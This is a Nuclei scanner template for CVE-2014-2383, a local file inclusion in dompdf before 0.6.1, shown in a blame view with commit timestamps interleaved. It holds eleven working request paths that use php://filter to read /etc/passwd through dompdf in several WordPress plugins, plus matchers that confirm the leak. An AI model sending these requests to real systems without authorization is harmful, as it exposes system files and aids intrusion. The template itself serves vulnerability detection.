nuclei-templates/http/cves/2014/CVE-2014-2383.yaml

57 lines
2.7 KiB
YAML
Raw Normal View History

2021-09-21 10:16:26 +00:00
id: CVE-2014-2383
2021-06-10 09:45:21 +00:00
info:
2022-08-10 05:05:50 +00:00
name: Dompdf < v0.6.0 - Local File Inclusion
author: 0x_Akoko,akincibor,ritikchaddha
2021-06-10 09:45:21 +00:00
severity: high
2022-08-06 12:50:12 +00:00
description: |
A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
reference:
- https://www.exploit-db.com/exploits/33004
- http://seclists.org/fulldisclosure/2014/Apr/258
- https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
2022-08-06 11:47:45 +00:00
- https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
2022-08-06 12:50:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-2383
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cve-id: CVE-2014-2383
2021-09-21 10:16:26 +00:00
metadata:
max-request: 11
2023-06-04 08:13:42 +00:00
verified: true
tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists
2021-06-11 09:52:14 +00:00
http:
2021-06-10 09:45:21 +00:00
- method: GET
path:
2022-08-10 05:05:50 +00:00
- "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
2021-10-09 11:07:50 +00:00
2021-10-09 05:16:16 +00:00
stop-at-first-match: true
2021-06-10 09:45:21 +00:00
matchers-condition: and
matchers:
2022-08-10 05:05:50 +00:00
- type: regex
regex:
- "root:[x*]:0:0"
2021-06-11 09:03:43 +00:00
- type: word
words:
- "application/pdf"
- 'filename="dompdf_out.pdf"'
part: header
2021-06-11 09:17:02 +00:00
condition: and
2021-06-10 09:45:21 +00:00
- type: status
status:
- 200